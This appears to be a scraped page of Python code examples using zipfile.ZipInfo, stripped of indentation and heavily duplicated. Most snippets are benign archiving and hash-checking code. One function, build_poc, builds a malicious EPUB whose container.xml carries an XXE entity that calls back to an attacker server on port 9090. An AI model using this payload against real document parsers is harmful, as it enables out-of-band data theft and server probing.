def prepare_zip():
from pkg_resources import resource_filename as resource
from config import config
from json import dumps
logger.info('creating/updating gimel.zip')
with ZipFile('gimel.zip', 'w', ZIP_DEFLATED) as zipf:
info = ZipInfo('config.json')
info.external_attr = 0o664 << 16
zipf.writestr(info, dumps(config))
zipf.write(resource('gimel', 'config.py'), 'config.py')
zipf.write(resource('gimel', 'gimel.py'), 'gimel.py')
zipf.write(resource('gimel', 'logger.py'), 'logger.py')
for root, dirs, files in os.walk(resource('gimel', 'vendor')):
for file in files:
real_file = os.path.join(root, file)
relative_file = os.path.relpath(real_file,
resource('gimel', ''))
zipf.write(real_file, relative_file)
python类ZipInfo()的实例源码
def add_dir_to_zip(zf, path, prefix=''):
'''
Add a directory recursively to the zip file with an optional prefix.
'''
if prefix:
zi = zipfile.ZipInfo(prefix + '/')
zi.external_attr = 16
zf.writestr(zi, '')
cwd = os.path.abspath(os.getcwd())
try:
os.chdir(path)
fp = (prefix + ('/' if prefix else '')).replace('//', '/')
for f in os.listdir('.'):
arcname = fp + f
if os.path.isdir(f):
add_dir_to_zip(zf, f, prefix=arcname)
else:
zf.write(f, arcname)
finally:
os.chdir(cwd)
def _write_symlink(self, zf, link_target, link_path):
"""Package symlinks with appropriate zipfile metadata."""
info = zipfile.ZipInfo()
info.filename = link_path
info.create_system = 3
# Magic code for symlinks / py2/3 compat
# 27166663808 = (stat.S_IFLNK | 0755) << 16
info.external_attr = 2716663808
zf.writestr(info, link_target)
def write_empty_dir(self, arcname, time_spec=TimeSpec.NOW, comment=None):
"""Explicitly add an empty directory entry to the archive"""
self._checkzfile()
arcname = self.cleanup_name(arcname, True)
arcname_enc, arcname_is_utf8 = self.encode_name(arcname)
comment_is_utf8 = False
zinfo = zipfile.ZipInfo(arcname_enc)
#zinfo.filename = arcname_enc
zinfo.date_time = self.timespec_to_zipinfo(time_spec)
zinfo.compress_type = zipfile.ZIP_STORED
zinfo.external_attr = 0o40775 << 16 # unix attributes drwxr-xr-x
zinfo.external_attr |= 0x10 # MS-DOS directory flag
if comment is not None:
zinfo.comment, comment_is_utf8 = self.encode_name(comment)
if arcname_is_utf8 or comment_is_utf8:
zinfo.flag_bits |= 1 << 11
self.zfile.writestr(zinfo, b'')
def open_bin(self, name: str):
"""Open a file in bytes mode or raise FileNotFoundError.
The filesystem needs to be open while accessing this.
"""
self._check_open()
# We need the zipinfo object.
if isinstance(name, ZipInfo):
info = name
else:
name = name.replace('\\', '/')
try:
info = self._name_to_info[name.casefold()]
except KeyError:
raise FileNotFoundError('{}:{}'.format(self.path, name)) from None
return self._ref.open(info)
def build_poc(server):
xxe = """<?xml version="1.0"?>
<!DOCTYPE foo [<!ENTITY xxe SYSTEM "http://%s:9090/">]>
<container version="1.0" xmlns="urn:oasis:names:tc:opendocument:xmlns:container">
<rootfiles>
<rootfile full-path="content.opf" media-type="application/oebps-package+xml">&xxe;</rootfile>
</rootfiles>
</container>""" % server
f = StringIO()
z = zipfile.ZipFile(f, 'w', zipfile.ZIP_DEFLATED)
zipinfo = zipfile.ZipInfo("META-INF/container.xml")
zipinfo.external_attr = 0777 << 16L
z.writestr(zipinfo, xxe)
z.close()
epub = open('poc.epub','wb')
epub.write(f.getvalue())
epub.close()
def add_to_zipfile(zf, name, base, zf_names):
abspath = j(base, name)
name = name.replace(os.sep, '/')
if name in zf_names:
raise ValueError('Already added %r to zipfile [%r]' % (name, abspath))
zinfo = zipfile.ZipInfo(filename=name, date_time=(1980, 1, 1, 0, 0, 0))
if os.path.isdir(abspath):
if not os.listdir(abspath):
return
zinfo.external_attr = 0o700 << 16
zf.writestr(zinfo, '')
for x in os.listdir(abspath):
add_to_zipfile(zf, name + os.sep + x, base, zf_names)
else:
ext = os.path.splitext(name)[1].lower()
if ext in ('.dll',):
raise ValueError('Cannot add %r to zipfile' % abspath)
zinfo.external_attr = 0o600 << 16
if ext in ('.py', '.pyc', '.pyo'):
with open(abspath, 'rb') as f:
zf.writestr(zinfo, f.read())
zf_names.add(name)
def setup_class(cls):
"create a zip egg and add it to sys.path"
egg = tempfile.NamedTemporaryFile(suffix='.egg', delete=False)
zip_egg = zipfile.ZipFile(egg, 'w')
zip_info = zipfile.ZipInfo()
zip_info.filename = 'mod.py'
zip_info.date_time = cls.ref_time.timetuple()
zip_egg.writestr(zip_info, 'x = 3\n')
zip_info = zipfile.ZipInfo()
zip_info.filename = 'data.dat'
zip_info.date_time = cls.ref_time.timetuple()
zip_egg.writestr(zip_info, 'hello, world!')
zip_egg.close()
egg.close()
sys.path.append(egg.name)
cls.finalizers.append(EggRemover(egg.name))
def open(self, name_or_info, mode="r", pwd=None):
"""Return file-like object for 'name'."""
# A non-monkey-patched version would contain most of zipfile.py
ef = zipfile.ZipFile.open(self, name_or_info, mode, pwd)
if isinstance(name_or_info, zipfile.ZipInfo):
name = name_or_info.filename
else:
name = name_or_info
if (name in self._expected_hashes
and self._expected_hashes[name] != None):
expected_hash = self._expected_hashes[name]
try:
_update_crc_orig = ef._update_crc
except AttributeError:
warnings.warn('Need ZipExtFile._update_crc to implement '
'file hash verification (in Python >= 2.7)')
return ef
running_hash = self._hash_algorithm()
if hasattr(ef, '_eof'): # py33
def _update_crc(data):
_update_crc_orig(data)
running_hash.update(data)
if ef._eof and running_hash.digest() != expected_hash:
raise BadWheelFile("Bad hash for file %r" % ef.name)
else:
def _update_crc(data, eof=None):
_update_crc_orig(data, eof=eof)
running_hash.update(data)
if eof and running_hash.digest() != expected_hash:
raise BadWheelFile("Bad hash for file %r" % ef.name)
ef._update_crc = _update_crc
elif self.strict and name not in self._expected_hashes:
raise BadWheelFile("No expected hash for file %r" % ef.name)
return ef
def open(self, name_or_info, mode="r", pwd=None):
"""Return file-like object for 'name'."""
# A non-monkey-patched version would contain most of zipfile.py
ef = zipfile.ZipFile.open(self, name_or_info, mode, pwd)
if isinstance(name_or_info, zipfile.ZipInfo):
name = name_or_info.filename
else:
name = name_or_info
if name in self._expected_hashes and self._expected_hashes[name] is not None:
expected_hash = self._expected_hashes[name]
try:
_update_crc_orig = ef._update_crc
except AttributeError:
warnings.warn('Need ZipExtFile._update_crc to implement '
'file hash verification (in Python >= 2.7)')
return ef
running_hash = self._hash_algorithm()
if hasattr(ef, '_eof'): # py33
def _update_crc(data):
_update_crc_orig(data)
running_hash.update(data)
if ef._eof and running_hash.digest() != expected_hash:
raise BadWheelFile("Bad hash for file %r" % ef.name)
else:
def _update_crc(data, eof=None):
_update_crc_orig(data, eof=eof)
running_hash.update(data)
if eof and running_hash.digest() != expected_hash:
raise BadWheelFile("Bad hash for file %r" % ef.name)
ef._update_crc = _update_crc
elif self.strict and name not in self._expected_hashes:
raise BadWheelFile("No expected hash for file %r" % ef.name)
return ef
def archive(self, build_dir):
assert self.source_dir
create_archive = True
archive_name = '%s-%s.zip' % (self.name, self.installed_version)
archive_path = os.path.join(build_dir, archive_name)
if os.path.exists(archive_path):
response = ask_path_exists(
'The file %s exists. (i)gnore, (w)ipe, (b)ackup ' %
display_path(archive_path), ('i', 'w', 'b'))
if response == 'i':
create_archive = False
elif response == 'w':
logger.warn('Deleting %s' % display_path(archive_path))
os.remove(archive_path)
elif response == 'b':
dest_file = backup_dir(archive_path)
logger.warn('Backing up %s to %s'
% (display_path(archive_path), display_path(dest_file)))
shutil.move(archive_path, dest_file)
if create_archive:
zip = zipfile.ZipFile(archive_path, 'w', zipfile.ZIP_DEFLATED)
dir = os.path.normcase(os.path.abspath(self.source_dir))
for dirpath, dirnames, filenames in os.walk(dir):
if 'pip-egg-info' in dirnames:
dirnames.remove('pip-egg-info')
for dirname in dirnames:
dirname = os.path.join(dirpath, dirname)
name = self._clean_zip_name(dirname, dir)
zipdir = zipfile.ZipInfo(self.name + '/' + name + '/')
zipdir.external_attr = 0x1ED << 16 # 0o755
zip.writestr(zipdir, '')
for filename in filenames:
if filename == PIP_DELETE_MARKER_FILENAME:
continue
filename = os.path.join(dirpath, filename)
name = self._clean_zip_name(filename, dir)
zip.write(filename, self.name + '/' + name)
zip.close()
logger.indent -= 2
logger.notify('Saved %s' % display_path(archive_path))
def _extract(self, member, path=None, pwd=None):
"""for zipfile py2.5 borrowed from cpython"""
if not isinstance(member, zipfile.ZipInfo):
member = self.getinfo(member)
if path is None:
path = os.getcwd()
return _extract_member(self, member, path, pwd)
def open(self, name_or_info, mode="r", pwd=None):
"""Return file-like object for 'name'."""
# A non-monkey-patched version would contain most of zipfile.py
ef = zipfile.ZipFile.open(self, name_or_info, mode, pwd)
if isinstance(name_or_info, zipfile.ZipInfo):
name = name_or_info.filename
else:
name = name_or_info
if (name in self._expected_hashes
and self._expected_hashes[name] != None):
expected_hash = self._expected_hashes[name]
try:
_update_crc_orig = ef._update_crc
except AttributeError:
warnings.warn('Need ZipExtFile._update_crc to implement '
'file hash verification (in Python >= 2.7)')
return ef
running_hash = self._hash_algorithm()
if hasattr(ef, '_eof'): # py33
def _update_crc(data):
_update_crc_orig(data)
running_hash.update(data)
if ef._eof and running_hash.digest() != expected_hash:
raise BadWheelFile("Bad hash for file %r" % ef.name)
else:
def _update_crc(data, eof=None):
_update_crc_orig(data, eof=eof)
running_hash.update(data)
if eof and running_hash.digest() != expected_hash:
raise BadWheelFile("Bad hash for file %r" % ef.name)
ef._update_crc = _update_crc
elif self.strict and name not in self._expected_hashes:
raise BadWheelFile("No expected hash for file %r" % ef.name)
return ef
def open(self, name_or_info, mode="r", pwd=None):
"""Return file-like object for 'name'."""
# A non-monkey-patched version would contain most of zipfile.py
ef = zipfile.ZipFile.open(self, name_or_info, mode, pwd)
if isinstance(name_or_info, zipfile.ZipInfo):
name = name_or_info.filename
else:
name = name_or_info
if (name in self._expected_hashes
and self._expected_hashes[name] != None):
expected_hash = self._expected_hashes[name]
try:
_update_crc_orig = ef._update_crc
except AttributeError:
warnings.warn('Need ZipExtFile._update_crc to implement '
'file hash verification (in Python >= 2.7)')
return ef
running_hash = self._hash_algorithm()
if hasattr(ef, '_eof'): # py33
def _update_crc(data):
_update_crc_orig(data)
running_hash.update(data)
if ef._eof and running_hash.digest() != expected_hash:
raise BadWheelFile("Bad hash for file %r" % ef.name)
else:
def _update_crc(data, eof=None):
_update_crc_orig(data, eof=eof)
running_hash.update(data)
if eof and running_hash.digest() != expected_hash:
raise BadWheelFile("Bad hash for file %r" % ef.name)
ef._update_crc = _update_crc
elif self.strict and name not in self._expected_hashes:
raise BadWheelFile("No expected hash for file %r" % ef.name)
return ef
def open(self, name_or_info, mode="r", pwd=None):
"""Return file-like object for 'name'."""
# A non-monkey-patched version would contain most of zipfile.py
ef = zipfile.ZipFile.open(self, name_or_info, mode, pwd)
if isinstance(name_or_info, zipfile.ZipInfo):
name = name_or_info.filename
else:
name = name_or_info
if (name in self._expected_hashes
and self._expected_hashes[name] != None):
expected_hash = self._expected_hashes[name]
try:
_update_crc_orig = ef._update_crc
except AttributeError:
warnings.warn('Need ZipExtFile._update_crc to implement '
'file hash verification (in Python >= 2.7)')
return ef
running_hash = self._hash_algorithm()
if hasattr(ef, '_eof'): # py33
def _update_crc(data):
_update_crc_orig(data)
running_hash.update(data)
if ef._eof and running_hash.digest() != expected_hash:
raise BadWheelFile("Bad hash for file %r" % ef.name)
else:
def _update_crc(data, eof=None):
_update_crc_orig(data, eof=eof)
running_hash.update(data)
if eof and running_hash.digest() != expected_hash:
raise BadWheelFile("Bad hash for file %r" % ef.name)
ef._update_crc = _update_crc
elif self.strict and name not in self._expected_hashes:
raise BadWheelFile("No expected hash for file %r" % ef.name)
return ef
def open(self, name_or_info, mode="r", pwd=None):
"""Return file-like object for 'name'."""
# A non-monkey-patched version would contain most of zipfile.py
ef = zipfile.ZipFile.open(self, name_or_info, mode, pwd)
if isinstance(name_or_info, zipfile.ZipInfo):
name = name_or_info.filename
else:
name = name_or_info
if (name in self._expected_hashes
and self._expected_hashes[name] != None):
expected_hash = self._expected_hashes[name]
try:
_update_crc_orig = ef._update_crc
except AttributeError:
warnings.warn('Need ZipExtFile._update_crc to implement '
'file hash verification (in Python >= 2.7)')
return ef
running_hash = self._hash_algorithm()
if hasattr(ef, '_eof'): # py33
def _update_crc(data):
_update_crc_orig(data)
running_hash.update(data)
if ef._eof and running_hash.digest() != expected_hash:
raise BadWheelFile("Bad hash for file %r" % ef.name)
else:
def _update_crc(data, eof=None):
_update_crc_orig(data, eof=eof)
running_hash.update(data)
if eof and running_hash.digest() != expected_hash:
raise BadWheelFile("Bad hash for file %r" % ef.name)
ef._update_crc = _update_crc
elif self.strict and name not in self._expected_hashes:
raise BadWheelFile("No expected hash for file %r" % ef.name)
return ef
def open(self, name_or_info, mode="r", pwd=None):
"""Return file-like object for 'name'."""
# A non-monkey-patched version would contain most of zipfile.py
ef = zipfile.ZipFile.open(self, name_or_info, mode, pwd)
if isinstance(name_or_info, zipfile.ZipInfo):
name = name_or_info.filename
else:
name = name_or_info
if (name in self._expected_hashes
and self._expected_hashes[name] != None):
expected_hash = self._expected_hashes[name]
try:
_update_crc_orig = ef._update_crc
except AttributeError:
warnings.warn('Need ZipExtFile._update_crc to implement '
'file hash verification (in Python >= 2.7)')
return ef
running_hash = self._hash_algorithm()
if hasattr(ef, '_eof'): # py33
def _update_crc(data):
_update_crc_orig(data)
running_hash.update(data)
if ef._eof and running_hash.digest() != expected_hash:
raise BadWheelFile("Bad hash for file %r" % ef.name)
else:
def _update_crc(data, eof=None):
_update_crc_orig(data, eof=eof)
running_hash.update(data)
if eof and running_hash.digest() != expected_hash:
raise BadWheelFile("Bad hash for file %r" % ef.name)
ef._update_crc = _update_crc
elif self.strict and name not in self._expected_hashes:
raise BadWheelFile("No expected hash for file %r" % ef.name)
return ef
def archive(self, build_dir):
assert self.source_dir
create_archive = True
archive_name = '%s-%s.zip' % (self.name, self.installed_version)
archive_path = os.path.join(build_dir, archive_name)
if os.path.exists(archive_path):
response = ask_path_exists(
'The file %s exists. (i)gnore, (w)ipe, (b)ackup ' %
display_path(archive_path), ('i', 'w', 'b'))
if response == 'i':
create_archive = False
elif response == 'w':
logger.warn('Deleting %s' % display_path(archive_path))
os.remove(archive_path)
elif response == 'b':
dest_file = backup_dir(archive_path)
logger.warn('Backing up %s to %s'
% (display_path(archive_path), display_path(dest_file)))
shutil.move(archive_path, dest_file)
if create_archive:
zip = zipfile.ZipFile(archive_path, 'w', zipfile.ZIP_DEFLATED)
dir = os.path.normcase(os.path.abspath(self.source_dir))
for dirpath, dirnames, filenames in os.walk(dir):
if 'pip-egg-info' in dirnames:
dirnames.remove('pip-egg-info')
for dirname in dirnames:
dirname = os.path.join(dirpath, dirname)
name = self._clean_zip_name(dirname, dir)
zipdir = zipfile.ZipInfo(self.name + '/' + name + '/')
zipdir.external_attr = 0x1ED << 16 # 0o755
zip.writestr(zipdir, '')
for filename in filenames:
if filename == PIP_DELETE_MARKER_FILENAME:
continue
filename = os.path.join(dirpath, filename)
name = self._clean_zip_name(filename, dir)
zip.write(filename, self.name + '/' + name)
zip.close()
logger.indent -= 2
logger.notify('Saved %s' % display_path(archive_path))
def sponsor_zip_logo_files(request):
"""Return a zip file of sponsor web and print logos"""
zip_stringio = StringIO()
zipfile = ZipFile(zip_stringio, "w")
try:
benefits = Benefit.objects.all()
for benefit in benefits:
dir_name = benefit.name.lower().replace(" ", "_").replace('/', '_')
for level in SponsorLevel.objects.all():
level_name = level.name.lower().replace(" ", "_").replace('/', '_')
for sponsor in Sponsor.objects.filter(level=level, active=True):
sponsor_name = sponsor.name.lower().replace(" ", "_").replace('/', '_')
full_dir = "/".join([dir_name, level_name, sponsor_name])
for sponsor_benefit in SponsorBenefit.objects.filter(
benefit=benefit,
sponsor=sponsor,
active=True,
).exclude(upload=''):
if os.path.exists(sponsor_benefit.upload.path):
modtime = time.gmtime(os.stat(sponsor_benefit.upload.path).st_mtime)
with open(sponsor_benefit.upload.path, "rb") as f:
fname = os.path.split(sponsor_benefit.upload.name)[-1]
zipinfo = ZipInfo(filename=full_dir + "/" + fname,
date_time=modtime)
zipfile.writestr(zipinfo, f.read())
else:
log.debug("No such sponsor file: %s" % sponsor_benefit.upload.path)
finally:
zipfile.close()
response = HttpResponse(zip_stringio.getvalue(),
content_type="application/zip")
prefix = settings.CONFERENCE_URL_PREFIXES[settings.CONFERENCE_ID]
response['Content-Disposition'] = \
'attachment; filename="pycon_%s_sponsorlogos.zip"' % prefix
return response
def open(self, name_or_info, mode="r", pwd=None):
"""Return file-like object for 'name'."""
# A non-monkey-patched version would contain most of zipfile.py
ef = zipfile.ZipFile.open(self, name_or_info, mode, pwd)
if isinstance(name_or_info, zipfile.ZipInfo):
name = name_or_info.filename
else:
name = name_or_info
if name in self._expected_hashes and self._expected_hashes[name] is not None:
expected_hash = self._expected_hashes[name]
try:
_update_crc_orig = ef._update_crc
except AttributeError:
warnings.warn('Need ZipExtFile._update_crc to implement '
'file hash verification (in Python >= 2.7)')
return ef
running_hash = self._hash_algorithm()
if hasattr(ef, '_eof'): # py33
def _update_crc(data):
_update_crc_orig(data)
running_hash.update(data)
if ef._eof and running_hash.digest() != expected_hash:
raise BadWheelFile("Bad hash for file %r" % ef.name)
else:
def _update_crc(data, eof=None):
_update_crc_orig(data, eof=eof)
running_hash.update(data)
if eof and running_hash.digest() != expected_hash:
raise BadWheelFile("Bad hash for file %r" % ef.name)
ef._update_crc = _update_crc
elif self.strict and name not in self._expected_hashes:
raise BadWheelFile("No expected hash for file %r" % ef.name)
return ef
def test_write_zip(self):
with patch('%s.zipfile.ZipFile' % pbm, autospec=True) as mock_zf:
with patch('%s.logger' % pbm, autospec=True) as mock_logger:
self.cls._write_zip('myfsrc', 'mypath.zip')
# the only way I can find to capture attributes being set on the ZipInfo
# is to not mock it, but use a real ZipInfo object. Unfortunately, that
# makes assertin on calls a bit more difficult...
assert len(mock_zf.mock_calls) == 4
assert mock_zf.mock_calls[0] == call('mypath.zip', 'w')
assert mock_zf.mock_calls[1] == call().__enter__()
assert mock_zf.mock_calls[3] == call().__exit__(None, None, None)
# ok, now handle the second call, which should have the ZipInfo
# as its first argument...
# test that it's the right chained method call
assert mock_zf.mock_calls[2][0] == '().__enter__().writestr'
# test its arguments
arg_tup = mock_zf.mock_calls[2][1]
assert isinstance(arg_tup[0], ZipInfo)
assert arg_tup[0].filename == 'webhook2lambda2sqs_func.py'
assert arg_tup[0].date_time == (2016, 7, 1, 2, 3, 4)
assert arg_tup[0].external_attr == 0x0755 << 16
assert arg_tup[1] == 'myfsrc'
assert mock_logger.mock_calls == [
call.debug('setting zipinfo date to: %s', (2016, 7, 1, 2, 3, 4)),
call.debug('setting zipinfo file mode to: %s', (0x0755 << 16)),
call.debug('writing zip file at: %s', 'mypath.zip')
]
def _write_zip(self, func_src, fpath):
"""
Write the function source to a zip file, suitable for upload to
Lambda.
Note there's a bit of undocumented magic going on here; Lambda needs
the execute bit set on the module with the handler in it (i.e. 0755
or 0555 permissions). There doesn't seem to be *any* documentation on
how to do this in the Python docs. The only real hint comes from the
source code of ``zipfile.ZipInfo.from_file()``, which includes:
st = os.stat(filename)
...
zinfo.external_attr = (st.st_mode & 0xFFFF) << 16 # Unix attributes
:param func_src: lambda function source
:type func_src: str
:param fpath: path to write the zip file at
:type fpath: str
"""
# get timestamp for file
now = datetime.now()
zi_tup = (now.year, now.month, now.day, now.hour, now.minute,
now.second)
logger.debug('setting zipinfo date to: %s', zi_tup)
# create a ZipInfo so we can set file attributes/mode
zinfo = zipfile.ZipInfo('webhook2lambda2sqs_func.py', zi_tup)
# set file mode
zinfo.external_attr = 0x0755 << 16
logger.debug('setting zipinfo file mode to: %s', zinfo.external_attr)
logger.debug('writing zip file at: %s', fpath)
with zipfile.ZipFile(fpath, 'w') as z:
z.writestr(zinfo, func_src)
def open(self, name_or_info, mode="r", pwd=None):
"""Return file-like object for 'name'."""
# A non-monkey-patched version would contain most of zipfile.py
ef = zipfile.ZipFile.open(self, name_or_info, mode, pwd)
if isinstance(name_or_info, zipfile.ZipInfo):
name = name_or_info.filename
else:
name = name_or_info
if (name in self._expected_hashes
and self._expected_hashes[name] != None):
expected_hash = self._expected_hashes[name]
try:
_update_crc_orig = ef._update_crc
except AttributeError:
warnings.warn('Need ZipExtFile._update_crc to implement '
'file hash verification (in Python >= 2.7)')
return ef
running_hash = self._hash_algorithm()
if hasattr(ef, '_eof'): # py33
def _update_crc(data):
_update_crc_orig(data)
running_hash.update(data)
if ef._eof and running_hash.digest() != expected_hash:
raise BadWheelFile("Bad hash for file %r" % ef.name)
else:
def _update_crc(data, eof=None):
_update_crc_orig(data, eof=eof)
running_hash.update(data)
if eof and running_hash.digest() != expected_hash:
raise BadWheelFile("Bad hash for file %r" % ef.name)
ef._update_crc = _update_crc
elif self.strict and name not in self._expected_hashes:
raise BadWheelFile("No expected hash for file %r" % ef.name)
return ef
def open(self, name_or_info, mode="r", pwd=None):
"""Return file-like object for 'name'."""
# A non-monkey-patched version would contain most of zipfile.py
ef = zipfile.ZipFile.open(self, name_or_info, mode, pwd)
if isinstance(name_or_info, zipfile.ZipInfo):
name = name_or_info.filename
else:
name = name_or_info
if (name in self._expected_hashes
and self._expected_hashes[name] != None):
expected_hash = self._expected_hashes[name]
try:
_update_crc_orig = ef._update_crc
except AttributeError:
warnings.warn('Need ZipExtFile._update_crc to implement '
'file hash verification (in Python >= 2.7)')
return ef
running_hash = self._hash_algorithm()
if hasattr(ef, '_eof'): # py33
def _update_crc(data):
_update_crc_orig(data)
running_hash.update(data)
if ef._eof and running_hash.digest() != expected_hash:
raise BadWheelFile("Bad hash for file %r" % ef.name)
else:
def _update_crc(data, eof=None):
_update_crc_orig(data, eof=eof)
running_hash.update(data)
if eof and running_hash.digest() != expected_hash:
raise BadWheelFile("Bad hash for file %r" % ef.name)
ef._update_crc = _update_crc
elif self.strict and name not in self._expected_hashes:
raise BadWheelFile("No expected hash for file %r" % ef.name)
return ef
def _extract_files_from_zip(self, zip_file):
for item in zip_file.infolist(): # not using ZipFile.extractall() for security reasons
assert isinstance(item, ZipInfo)
LOGGER.debug('unzipping item: {}'.format(item.filename))
try:
zip_file.extract(item, self.tmpdir.abspath())
except:
LOGGER.error('failed to extract archive member: {}'.format(item.filename))
raise
def open(self, name_or_info, mode="r", pwd=None):
"""Return file-like object for 'name'."""
# A non-monkey-patched version would contain most of zipfile.py
ef = zipfile.ZipFile.open(self, name_or_info, mode, pwd)
if isinstance(name_or_info, zipfile.ZipInfo):
name = name_or_info.filename
else:
name = name_or_info
if (name in self._expected_hashes
and self._expected_hashes[name] != None):
expected_hash = self._expected_hashes[name]
try:
_update_crc_orig = ef._update_crc
except AttributeError:
warnings.warn('Need ZipExtFile._update_crc to implement '
'file hash verification (in Python >= 2.7)')
return ef
running_hash = self._hash_algorithm()
if hasattr(ef, '_eof'): # py33
def _update_crc(data):
_update_crc_orig(data)
running_hash.update(data)
if ef._eof and running_hash.digest() != expected_hash:
raise BadWheelFile("Bad hash for file %r" % ef.name)
else:
def _update_crc(data, eof=None):
_update_crc_orig(data, eof=eof)
running_hash.update(data)
if eof and running_hash.digest() != expected_hash:
raise BadWheelFile("Bad hash for file %r" % ef.name)
ef._update_crc = _update_crc
elif self.strict and name not in self._expected_hashes:
raise BadWheelFile("No expected hash for file %r" % ef.name)
return ef
def IsSymlink(zip_file, name):
zi = zip_file.getinfo(name)
# The two high-order bytes of ZipInfo.external_attr represent
# UNIX permissions and file type bits.
return stat.S_ISLNK(zi.external_attr >> 16L)
def AddToZipHermetic(zip_file, zip_path, src_path=None, data=None,
compress=None):
"""Adds a file to the given ZipFile with a hard-coded modified time.
Args:
zip_file: ZipFile instance to add the file to.
zip_path: Destination path within the zip file.
src_path: Path of the source file. Mutually exclusive with |data|.
data: File data as a string.
compress: Whether to enable compression. Default is taken from ZipFile
constructor.
"""
assert (src_path is None) != (data is None), (
'|src_path| and |data| are mutually exclusive.')
CheckZipPath(zip_path)
zipinfo = zipfile.ZipInfo(filename=zip_path, date_time=HERMETIC_TIMESTAMP)
zipinfo.external_attr = _HERMETIC_FILE_ATTR
if src_path and os.path.islink(src_path):
zipinfo.filename = zip_path
zipinfo.external_attr |= stat.S_IFLNK << 16L # mark as a symlink
zip_file.writestr(zipinfo, os.readlink(src_path))
return
if src_path:
with file(src_path) as f:
data = f.read()
# zipfile will deflate even when it makes the file bigger. To avoid
# growing files, disable compression at an arbitrary cut off point.
if len(data) < 16:
compress = False
# None converts to ZIP_STORED, when passed explicitly rather than the
# default passed to the ZipFile constructor.
compress_type = zip_file.compression
if compress is not None:
compress_type = zipfile.ZIP_DEFLATED if compress else zipfile.ZIP_STORED
zip_file.writestr(zipinfo, data, compress_type)
def _add_zip(self, zfile, name, data, date_time):
"""
Add a zip file to an archive
"""
zipinfo = zipfile.ZipInfo(name)
zipinfo.date_time = date_time
zipinfo.compress_type = zipfile.ZIP_DEFLATED
zipinfo.external_attr = 0o644 << 16
zfile.writestr(zipinfo, data)
def open(self, name_or_info, mode="r", pwd=None):
"""Return file-like object for 'name'."""
# A non-monkey-patched version would contain most of zipfile.py
ef = zipfile.ZipFile.open(self, name_or_info, mode, pwd)
if isinstance(name_or_info, zipfile.ZipInfo):
name = name_or_info.filename
else:
name = name_or_info
if (name in self._expected_hashes
and self._expected_hashes[name] != None):
expected_hash = self._expected_hashes[name]
try:
_update_crc_orig = ef._update_crc
except AttributeError:
warnings.warn('Need ZipExtFile._update_crc to implement '
'file hash verification (in Python >= 2.7)')
return ef
running_hash = self._hash_algorithm()
if hasattr(ef, '_eof'): # py33
def _update_crc(data):
_update_crc_orig(data)
running_hash.update(data)
if ef._eof and running_hash.digest() != expected_hash:
raise BadWheelFile("Bad hash for file %r" % ef.name)
else:
def _update_crc(data, eof=None):
_update_crc_orig(data, eof=eof)
running_hash.update(data)
if eof and running_hash.digest() != expected_hash:
raise BadWheelFile("Bad hash for file %r" % ef.name)
ef._update_crc = _update_crc
elif self.strict and name not in self._expected_hashes:
raise BadWheelFile("No expected hash for file %r" % ef.name)
return ef